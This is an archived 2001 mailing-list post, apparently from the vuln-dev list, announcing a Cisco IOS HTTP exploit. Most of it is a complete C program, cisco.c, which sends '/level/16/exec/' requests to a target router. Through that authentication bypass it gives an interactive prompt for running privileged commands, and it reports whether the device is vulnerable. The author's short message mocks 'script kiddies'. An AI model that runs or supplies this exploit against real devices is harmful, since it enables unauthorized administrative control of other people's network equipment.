Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Tue, 3 Jul 2001 12:01:47 -0300
From: =?iso-8859-1?Q?Sarda=F1ons=2C_Eliel?= <Eliel.Sardanons@philips.edu.ar.>
To: "[email protected]" <vuln-dev@securityfocus.com.>,
Subject: Cisco IOS HTTP Exploit (another)

------_=_NextPart_000_01C103D1.151C57C0
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hey, this code was done for all the script kiddies and lame populus..=20

Don't use my program.. :) use your browser or your telnet client...

Eliel C. Sarda=F1ons
<eliel.sardanons@philips.edu.ar.>

 <<cisco.c>>=20

------_=_NextPart_000_01C103D1.151C57C0
Content-Type: application/octet-stream;
        name="cisco.c"
Content-Disposition: attachment;
        filename="cisco.c"

/* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar.>
 * to compile:
 * bash# gcc -o cisco cisco.c 
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define HTTP_PORT 80
#define PROMPT "\ncisco$ "

int usage (char *progname) {
        printf ("Usage:\n\t%s server\n", progname);
        exit(-1);
}								
        
int main (int argc, char *argv[]) {
        struct hostent *he;
        struct sockaddr_in sin;
        int sck, i;
        char command[256], buffer[512];
        if (argc < 2)
        usage(argv[0]);
        if ((he = gethostbyname(argv[1])) == NULL) {
        perror("host()");
        exit(-1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(HTTP_PORT);
        sin.sin_addr = *((struct in_addr *)he->h_addr);
        while (1) {
        if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
        perror("socket()");
        exit(-1);
        }
        if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
        perror ("connect()");
        exit(-1);
        }
        printf (PROMPT);
        fgets (command, 256, stdin);
        if (strlen(command) == 1) 
        break;
        for (i=0;i<strlen(command);i++) {
        if (command[i] == ' ')
        command[i] = '/';
        }
        snprintf (buffer, sizeof(buffer), 
        "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
        write (sck, buffer, strlen(buffer));
        memset (buffer, 0, sizeof(buffer));
        while ((read (sck, buffer, sizeof(buffer))) != 0) {
        if ((strstr(buffer, "CR</A>")) != 0) {
        printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
        memset (buffer, 0, sizeof(buffer));
        break;
        } else if ((strstr(buffer, "Unauthorized")) != 0) {
        printf ("Server not vulnerable\n");
        exit(-1);
        } else {
        printf ("%s", buffer);
        memset (buffer, 0, sizeof(buffer));
        }
         }
        }
        printf ("Thanks...\n");
        exit(0);
}

------_=_NextPart_000_01C103D1.151C57C0--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: